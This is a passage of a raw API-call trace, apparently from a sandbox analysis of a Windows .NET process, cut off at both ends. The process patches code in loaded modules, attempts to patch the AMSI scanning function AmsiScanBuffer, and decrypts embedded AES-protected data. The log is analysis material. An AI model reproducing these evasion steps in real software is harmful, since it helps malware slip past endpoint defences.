lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x75010000, SizeOfImage=0x13b000, EntryPoint=0x750ecc89)) returned 1 [0218.344] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75000000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x75000000, SizeOfImage=0xd000, EntryPoint=0x750013e4)) returned 1 [0218.345] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74fa0000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x74fa0000, SizeOfImage=0x5f000, EntryPoint=0x0)) returned 1 [0218.345] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74f10000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x74f10000, SizeOfImage=0x78000, EntryPoint=0x74f1f7ba)) returned 1 [0218.346] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75640000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x75640000, SizeOfImage=0x9000, EntryPoint=0x75641220)) returned 1 [0218.346] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74860000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x74860000, SizeOfImage=0x6a8000, EntryPoint=0x749a7040)) returned 1 [0218.347] GetModuleBaseNameW (in: hProcess=0xffffffff, hModule=0x74860000, lpBaseName=0x189b48, nSize=0x104 | out: lpBaseName="clr.dll") returned 0x7 [0218.451] StrStrIW (lpFirst="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\500ffa28b327e171fe664023003e947e\\System.ni.dll", lpSrch="\\system.ni.dll") returned="\\System.ni.dll" [0218.451] CloseHandle (hObject=0xa0) [0218.451] VirtualProtect (in: lpAddress=0x769a1245, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x189d58 | out: lpflOldProtect=0x189d58*=0x20) returned 1 [0218.452] VirtualProtect (in: lpAddress=0x769a1245, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x189d58 | out: lpflOldProtect=0x189d58*=0x40) returned 1 [0218.470] GetCurrentProcess () returned 0xffffffff [0218.470] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x769a1245, dwSize=0x5) returned 1 [0218.470] VirtualProtect (in: lpAddress=0x769a34b0, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x189d58 | out: lpflOldProtect=0x189d58*=0x20) returned 1 [0218.470] VirtualProtect (in: lpAddress=0x769a34b0, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x189d58 | out: lpflOldProtect=0x189d58*=0x40) returned 1 [0218.498] GetCurrentProcess () returned 0xffffffff [0218.498] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x769a34b0, dwSize=0x5) returned 1 [0218.498] VirtualProtect (in: lpAddress=0x769a4950, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x189d58 | out: lpflOldProtect=0x189d58*=0x20) returned 1 [0218.498] VirtualProtect (in: lpAddress=0x769a4950, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x189d58 | out: lpflOldProtect=0x189d58*=0x40) returned 1 [0218.516] GetCurrentProcess () returned 0xffffffff [0218.516] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x769a4950, dwSize=0x5) returned 1 [0218.516] VirtualProtect (in: lpAddress=0x769a14b1, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x189d58 | out: lpflOldProtect=0x189d58*=0x20) returned 1 [0218.516] VirtualProtect (in: lpAddress=0x769a14b1, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x189d58 | out: lpflOldProtect=0x189d58*=0x40) returned 1 [0218.534] GetCurrentProcess () returned 0xffffffff [0218.534] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x769a14b1, dwSize=0x5) returned 1 [0218.534] VirtualProtect (in: lpAddress=0x77c2ff94, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x189d58 | out: lpflOldProtect=0x189d58*=0x20) returned 1 [0218.534] VirtualProtect (in: lpAddress=0x77c2ff94, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x189d58 | out: lpflOldProtect=0x189d58*=0x40) returned 1 [0218.583] GetCurrentProcess () returned 0xffffffff [0218.583] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x77c2ff94, dwSize=0x5) returned 1 [0218.583] VirtualProtect (in: lpAddress=0x769a3f5c, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x189d58 | out: lpflOldProtect=0x189d58*=0x20) returned 1 [0218.584] VirtualProtect (in: lpAddress=0x769a3f5c, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x189d58 | out: lpflOldProtect=0x189d58*=0x40) returned 1 [0218.601] GetCurrentProcess () returned 0xffffffff [0218.601] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x769a3f5c, dwSize=0x5) returned 1 [0218.601] VirtualProtect (in: lpAddress=0x769a196e, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x189d58 | out: lpflOldProtect=0x189d58*=0x20) returned 1 [0218.602] VirtualProtect (in: lpAddress=0x769a196e, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x189d58 | out: lpflOldProtect=0x189d58*=0x40) returned 1 [0218.629] GetCurrentProcess () returned 0xffffffff [0218.629] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x769a196e, dwSize=0x5) returned 1 [0218.629] VirtualProtect (in: lpAddress=0x769a18f1, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x189d58 | out: lpflOldProtect=0x189d58*=0x20) returned 1 [0218.630] VirtualProtect (in: lpAddress=0x769a18f1, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x189d58 | out: lpflOldProtect=0x189d58*=0x40) returned 1 [0218.663] GetCurrentProcess () returned 0xffffffff [0218.663] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x769a18f1, dwSize=0x5) returned 1 [0218.663] VirtualProtect (in: lpAddress=0x769a495d, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x189d58 | out: lpflOldProtect=0x189d58*=0x20) returned 1 [0218.664] VirtualProtect (in: lpAddress=0x769a495d, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x189d58 | out: lpflOldProtect=0x189d58*=0x40) returned 1 [0218.681] GetCurrentProcess () returned 0xffffffff [0218.681] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x769a495d, dwSize=0x5) returned 1 [0218.682] VirtualProtect (in: lpAddress=0x769a1410, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x189d58 | out: lpflOldProtect=0x189d58*=0x20) returned 1 [0218.682] VirtualProtect (in: lpAddress=0x769a1410, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x189d58 | out: lpflOldProtect=0x189d58*=0x40) returned 1 [0218.699] GetCurrentProcess () returned 0xffffffff [0218.699] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x769a1410, dwSize=0x5) returned 1 [0221.415] LoadLibraryA (lpLibFileName="amsi.dll") returned 0x0 [0221.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AmsiScanBuffer", cchWideChar=14, lpMultiByteStr=0x18a298, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AmsiScanBufferG\x02ze\x9bÊ\x94Â\x86t\x14¦\x18", lpUsedDefaultChar=0x0) returned 14 [0221.435] GetProcAddress (hModule=0x0, lpProcName="AmsiScanBuffer") returned 0x0 [0221.499] VirtualProtect (in: lpAddress=0x0, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x2698974 | out: lpflOldProtect=0x2698974*=0x3b73940) returned 0 [0221.529] EtwEventRegister () returned 0x0 [0223.282] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x7726d8) returned 1 [0223.287] CryptGetProvParam (in: hProv=0x7726d8, dwParam=0x1, pbData=0x0, pdwDataLen=0x18a1f8, dwFlags=0x1 | out: pbData=0x0, pdwDataLen=0x18a1f8) returned 1 [0223.288] CoTaskMemAlloc (cb=0x20) returned 0x79b200 [0223.288] CryptGetProvParam (in: hProv=0x7726d8, dwParam=0x1, pbData=0x79b200, pdwDataLen=0x18a1f8, dwFlags=0x1 | out: pbData=0x79b200, pdwDataLen=0x18a1f8) returned 1 [0223.290] CoTaskMemFree (pv=0x79b200) [0223.290] CryptGetProvParam (in: hProv=0x7726d8, dwParam=0x1, pbData=0x0, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18a1f8) returned 1 [0223.290] CoTaskMemAlloc (cb=0x20) returned 0x79b200 [0223.291] CryptGetProvParam (in: hProv=0x7726d8, dwParam=0x1, pbData=0x79b200, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x79b200, pdwDataLen=0x18a1f8) returned 1 [0223.291] CoTaskMemFree (pv=0x79b200) [0223.291] CryptGetProvParam (in: hProv=0x7726d8, dwParam=0x1, pbData=0x0, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18a1f8) returned 1 [0223.291] CoTaskMemAlloc (cb=0x20) returned 0x79b200 [0223.291] CryptGetProvParam (in: hProv=0x7726d8, dwParam=0x1, pbData=0x79b200, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x79b200, pdwDataLen=0x18a1f8) returned 1 [0223.291] CoTaskMemFree (pv=0x79b200) [0223.291] CryptGetProvParam (in: hProv=0x7726d8, dwParam=0x1, pbData=0x0, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18a1f8) returned 1 [0223.291] CoTaskMemAlloc (cb=0x20) returned 0x79b200 [0223.291] CryptGetProvParam (in: hProv=0x7726d8, dwParam=0x1, pbData=0x79b200, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x79b200, pdwDataLen=0x18a1f8) returned 1 [0223.291] CoTaskMemFree (pv=0x79b200) [0223.291] CryptGetProvParam (in: hProv=0x7726d8, dwParam=0x1, pbData=0x0, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18a1f8) returned 1 [0223.291] CoTaskMemAlloc (cb=0x20) returned 0x79b200 [0223.291] CryptGetProvParam (in: hProv=0x7726d8, dwParam=0x1, pbData=0x79b200, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x79b200, pdwDataLen=0x18a1f8) returned 1 [0223.291] CoTaskMemFree (pv=0x79b200) [0223.291] CryptGetProvParam (in: hProv=0x7726d8, dwParam=0x1, pbData=0x0, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18a1f8) returned 1 [0223.291] CoTaskMemAlloc (cb=0x20) returned 0x79b200 [0223.291] CryptGetProvParam (in: hProv=0x7726d8, dwParam=0x1, pbData=0x79b200, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x79b200, pdwDataLen=0x18a1f8) returned 1 [0223.291] CoTaskMemFree (pv=0x79b200) [0223.291] CryptGetProvParam (in: hProv=0x7726d8, dwParam=0x1, pbData=0x0, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18a1f8) returned 1 [0223.291] CoTaskMemAlloc (cb=0x20) returned 0x79b200 [0223.291] CryptGetProvParam (in: hProv=0x7726d8, dwParam=0x1, pbData=0x79b200, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x79b200, pdwDataLen=0x18a1f8) returned 1 [0223.291] CoTaskMemFree (pv=0x79b200) [0223.291] CryptGetProvParam (in: hProv=0x7726d8, dwParam=0x1, pbData=0x0, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18a1f8) returned 1 [0223.292] CoTaskMemAlloc (cb=0x20) returned 0x79b200 [0223.292] CryptGetProvParam (in: hProv=0x7726d8, dwParam=0x1, pbData=0x79b200, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x79b200, pdwDataLen=0x18a1f8) returned 1 [0223.292] CoTaskMemFree (pv=0x79b200) [0223.292] CryptGetProvParam (in: hProv=0x7726d8, dwParam=0x1, pbData=0x0, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18a1f8) returned 1 [0223.292] CoTaskMemAlloc (cb=0x20) returned 0x79b200 [0223.292] CryptGetProvParam (in: hProv=0x7726d8, dwParam=0x1, pbData=0x79b200, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x79b200, pdwDataLen=0x18a1f8) returned 1 [0223.292] CoTaskMemFree (pv=0x79b200) [0223.292] CryptGetProvParam (in: hProv=0x7726d8, dwParam=0x1, pbData=0x0, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18a1f8) returned 1 [0223.292] CoTaskMemAlloc (cb=0x20) returned 0x79b200 [0223.292] CryptGetProvParam (in: hProv=0x7726d8, dwParam=0x1, pbData=0x79b200, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x79b200, pdwDataLen=0x18a1f8) returned 1 [0223.292] CoTaskMemFree (pv=0x79b200) [0223.292] CryptGetProvParam (in: hProv=0x7726d8, dwParam=0x1, pbData=0x0, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18a1f8) returned 1 [0223.292] CoTaskMemAlloc (cb=0x20) returned 0x79b200 [0223.292] CryptGetProvParam (in: hProv=0x7726d8, dwParam=0x1, pbData=0x79b200, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x79b200, pdwDataLen=0x18a1f8) returned 1 [0223.292] CoTaskMemFree (pv=0x79b200) [0223.292] CryptGetProvParam (in: hProv=0x7726d8, dwParam=0x1, pbData=0x0, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18a1f8) returned 1 [0223.292] CoTaskMemAlloc (cb=0x20) returned 0x79b200 [0223.292] CryptGetProvParam (in: hProv=0x7726d8, dwParam=0x1, pbData=0x79b200, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x79b200, pdwDataLen=0x18a1f8) returned 1 [0223.292] CoTaskMemFree (pv=0x79b200) [0223.292] CryptGetProvParam (in: hProv=0x7726d8, dwParam=0x1, pbData=0x0, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18a1f8) returned 1 [0223.292] CoTaskMemAlloc (cb=0x20) returned 0x79b200 [0223.292] CryptGetProvParam (in: hProv=0x7726d8, dwParam=0x1, pbData=0x79b200, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x79b200, pdwDataLen=0x18a1f8) returned 1 [0223.292] CoTaskMemFree (pv=0x79b200) [0223.292] CryptGetProvParam (in: hProv=0x7726d8, dwParam=0x1, pbData=0x0, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18a1f8) returned 1 [0223.292] CoTaskMemAlloc (cb=0x20) returned 0x79b200 [0223.293] CryptGetProvParam (in: hProv=0x7726d8, dwParam=0x1, pbData=0x79b200, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x79b200, pdwDataLen=0x18a1f8) returned 1 [0223.293] CoTaskMemFree (pv=0x79b200) [0223.293] CryptGetProvParam (in: hProv=0x7726d8, dwParam=0x1, pbData=0x0, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18a1f8) returned 1 [0223.293] CoTaskMemAlloc (cb=0x20) returned 0x79b200 [0223.293] CryptGetProvParam (in: hProv=0x7726d8, dwParam=0x1, pbData=0x79b200, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x79b200, pdwDataLen=0x18a1f8) returned 1 [0223.293] CoTaskMemFree (pv=0x79b200) [0223.293] CryptGetProvParam (in: hProv=0x7726d8, dwParam=0x1, pbData=0x0, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18a1f8) returned 1 [0223.293] CoTaskMemAlloc (cb=0x20) returned 0x79b200 [0223.293] CryptGetProvParam (in: hProv=0x7726d8, dwParam=0x1, pbData=0x79b200, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x79b200, pdwDataLen=0x18a1f8) returned 1 [0223.293] CoTaskMemFree (pv=0x79b200) [0223.293] CryptGetProvParam (in: hProv=0x7726d8, dwParam=0x1, pbData=0x0, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18a1f8) returned 1 [0223.293] CoTaskMemAlloc (cb=0x20) returned 0x79b200 [0223.293] CryptGetProvParam (in: hProv=0x7726d8, dwParam=0x1, pbData=0x79b200, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x79b200, pdwDataLen=0x18a1f8) returned 1 [0223.293] CoTaskMemFree (pv=0x79b200) [0223.293] CryptGetProvParam (in: hProv=0x7726d8, dwParam=0x1, pbData=0x0, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18a1f8) returned 1 [0223.293] CoTaskMemAlloc (cb=0x20) returned 0x79b200 [0223.293] CryptGetProvParam (in: hProv=0x7726d8, dwParam=0x1, pbData=0x79b200, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x79b200, pdwDataLen=0x18a1f8) returned 1 [0223.293] CoTaskMemFree (pv=0x79b200) [0223.293] CryptGetProvParam (in: hProv=0x7726d8, dwParam=0x1, pbData=0x0, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18a1f8) returned 1 [0223.293] CoTaskMemAlloc (cb=0x20) returned 0x79b200 [0223.293] CryptGetProvParam (in: hProv=0x7726d8, dwParam=0x1, pbData=0x79b200, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x79b200, pdwDataLen=0x18a1f8) returned 1 [0223.294] CoTaskMemFree (pv=0x79b200) [0223.294] CryptGetProvParam (in: hProv=0x7726d8, dwParam=0x1, pbData=0x0, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18a1f8) returned 1 [0223.294] CoTaskMemAlloc (cb=0x20) returned 0x79b200 [0223.294] CryptGetProvParam (in: hProv=0x7726d8, dwParam=0x1, pbData=0x79b200, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x79b200, pdwDataLen=0x18a1f8) returned 1 [0223.294] CoTaskMemFree (pv=0x79b200) [0223.294] CryptGetProvParam (in: hProv=0x7726d8, dwParam=0x1, pbData=0x0, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18a1f8) returned 0 [0223.330] CryptImportKey (in: hProv=0x7726d8, pbData=0x26f1a20, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x758e60) returned 1 [0223.332] CryptContextAddRef (hProv=0x7726d8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.347] BCryptGetFipsAlgorithmMode (in: pfEnabled=0x18a224 | out: pfEnabled=0x18a224) returned 0x0 [0223.383] CryptContextAddRef (hProv=0x7726d8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.384] CryptDuplicateKey (in: hKey=0x758e60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x758f20) returned 1 [0223.384] CryptContextAddRef (hProv=0x7726d8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.384] CryptSetKeyParam (hKey=0x758f20, dwParam=0x4, pbData=0x26f5010*=0x1, dwFlags=0x0) returned 1 [0223.384] CryptSetKeyParam (hKey=0x758f20, dwParam=0x1, pbData=0x26f4fdc, dwFlags=0x0) returned 1 [0223.385] CryptDecrypt (in: hKey=0x758f20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26f50f4, pdwDataLen=0x18a1f0 | out: pbData=0x26f50f4, pdwDataLen=0x18a1f0) returned 1 [0223.387] CryptDecrypt (in: hKey=0x758f20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26f5154, pdwDataLen=0x18a220 | out: pbData=0x26f5154, pdwDataLen=0x18a220) returned 1 [0223.387] CryptDecrypt (in: hKey=0x758f20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x26f5198, pdwDataLen=0x18a220 | out: pbData=0x26f5198, pdwDataLen=0x18a220) returned 0 [0223.397] CryptDestroyKey (hKey=0x758e60) returned 1 [0223.397] CryptReleaseContext (hProv=0x7726d8, dwFlags=0x0) returned 1 [0223.397] CryptReleaseContext (hProv=0x7726d8, dwFlags=0x0) returned 1 [0223.406] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x772760) returned 1 [0223.416] CryptImportKey (in: hProv=0x772760, pbData=0x26f60b4, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x758e60) returned 1 [0223.417] CryptContextAddRef (hProv=0x772760, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.417] CryptContextAddRef (hProv=0x772760, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.417] CryptDuplicateKey (in: hKey=0x758e60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x758f60) returned 1 [0223.417] CryptContextAddRef (hProv=0x772760, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.417] CryptSetKeyParam (hKey=0x758f60, dwParam=0x4, pbData=0x26f6824*=0x1, dwFlags=0x0) returned 1 [0223.417] CryptSetKeyParam (hKey=0x758f60, dwParam=0x1, pbData=0x26f67f0, dwFlags=0x0) returned 1 [0223.417] CryptDecrypt (in: hKey=0x758f60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26f6904, pdwDataLen=0x18a220 | out: pbData=0x26f6904, pdwDataLen=0x18a220) returned 1 [0223.418] CryptDecrypt (in: hKey=0x758f60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x26f694c, pdwDataLen=0x18a220 | out: pbData=0x26f694c, pdwDataLen=0x18a220) returned 0 [0223.418] CryptDestroyKey (hKey=0x758e60) returned 1 [0223.418] CryptReleaseContext (hProv=0x772760, dwFlags=0x0) returned 1 [0223.418] CryptReleaseContext (hProv=0x772760, dwFlags=0x0) returned 1 [0223.418] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x7727e8) returned 1 [0223.419] CryptImportKey (in: hProv=0x7727e8, pbData=0x26f6c84, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x758e60) returned 1 [0223.419] CryptContextAddRef (hProv=0x7727e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.419] CryptContextAddRef (hProv=0x7727e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.419] CryptDuplicateKey (in: hKey=0x758e60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4b74410) returned 1 [0223.419] CryptContextAddRef (hProv=0x7727e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.419] CryptSetKeyParam (hKey=0x4b74410, dwParam=0x4, pbData=0x26f73f4*=0x1, dwFlags=0x0) returned 1 [0223.419] CryptSetKeyParam (hKey=0x4b74410, dwParam=0x1, pbData=0x26f73c0, dwFlags=0x0) returned 1 [0223.419] CryptDecrypt (in: hKey=0x4b74410, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26f74d4, pdwDataLen=0x18a220 | out: pbData=0x26f74d4, pdwDataLen=0x18a220) returned 1 [0223.419] CryptDecrypt (in: hKey=0x4b74410, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x26f7524, pdwDataLen=0x18a220 | out: pbData=0x26f7524, pdwDataLen=0x18a220) returned 0 [0223.419] CryptDestroyKey (hKey=0x758e60) returned 1 [0223.419] CryptReleaseContext (hProv=0x7727e8, dwFlags=0x0) returned 1 [0223.419] CryptReleaseContext (hProv=0x7727e8, dwFlags=0x0) returned 1 [0223.419] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x772870) returned 1 [0223.420] CryptImportKey (in: hProv=0x772870, pbData=0x26f78a4, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x758e60) returned 1 [0223.420] CryptContextAddRef (hProv=0x772870, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.421] CryptContextAddRef (hProv=0x772870, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.421] CryptDuplicateKey (in: hKey=0x758e60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4b74490) returned 1 [0223.421] CryptContextAddRef (hProv=0x772870, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.421] CryptSetKeyParam (hKey=0x4b74490, dwParam=0x4, pbData=0x26f8014*=0x1, dwFlags=0x0) returned 1 [0223.421] CryptSetKeyParam (hKey=0x4b74490, dwParam=0x1, pbData=0x26f7fe0, dwFlags=0x0) returned 1 [0223.421] CryptDecrypt (in: hKey=0x4b74490, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26f80f4, pdwDataLen=0x18a220 | out: pbData=0x26f80f4, pdwDataLen=0x18a220) returned 1 [0223.421] CryptDecrypt (in: hKey=0x4b74490, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x26f8138, pdwDataLen=0x18a220 | out: pbData=0x26f8138, pdwDataLen=0x18a220) returned 0 [0223.421] CryptDestroyKey (hKey=0x758e60) returned 1 [0223.421] CryptReleaseContext (hProv=0x772870, dwFlags=0x0) returned 1 [0223.421] CryptReleaseContext (hProv=0x772870, dwFlags=0x0) returned 1 [0223.421] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x7728f8) returned 1 [0223.422] CryptImportKey (in: hProv=0x7728f8, pbData=0x26f8468, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x758e60) returned 1 [0223.422] CryptContextAddRef (hProv=0x7728f8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.422] CryptContextAddRef (hProv=0x7728f8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.422] CryptDuplicateKey (in: hKey=0x758e60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4b74510) returned 1 [0223.422] CryptContextAddRef (hProv=0x7728f8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.422] CryptSetKeyParam (hKey=0x4b74510, dwParam=0x4, pbData=0x26f8bd8*=0x1, dwFlags=0x0) returned 1 [0223.422] CryptSetKeyParam (hKey=0x4b74510, dwParam=0x1, pbData=0x26f8ba4, dwFlags=0x0) returned 1 [0223.423] CryptDecrypt (in: hKey=0x4b74510, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26f8cb8, pdwDataLen=0x18a220 | out: pbData=0x26f8cb8, pdwDataLen=0x18a220) returned 1 [0223.423] CryptDecrypt (in: hKey=0x4b74510, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x26f8cf8, pdwDataLen=0x18a220 | out: pbData=0x26f8cf8, pdwDataLen=0x18a220) returned 0 [0223.423] CryptDestroyKey (hKey=0x758e60) returned 1 [0223.423] CryptReleaseContext (hProv=0x7728f8, dwFlags=0x0) returned 1 [0223.423] CryptReleaseContext (hProv=0x7728f8, dwFlags=0x0) returned 1 [0223.424] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x772980) returned 1 [0223.425] CryptImportKey (in: hProv=0x772980, pbData=0x26f9010, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x758e60) returned 1 [0223.425] CryptContextAddRef (hProv=0x772980, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.425] CryptContextAddRef (hProv=0x772980, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.425] CryptDuplicateKey (in: hKey=0x758e60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4b74590) returned 1 [0223.425] CryptContextAddRef (hProv=0x772980, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.426] CryptSetKeyParam (hKey=0x4b74590, dwParam=0x4, pbData=0x26f9780*=0x1, dwFlags=0x0) returned 1 [0223.426] CryptSetKeyParam (hKey=0x4b74590, dwParam=0x1, pbData=0x26f974c, 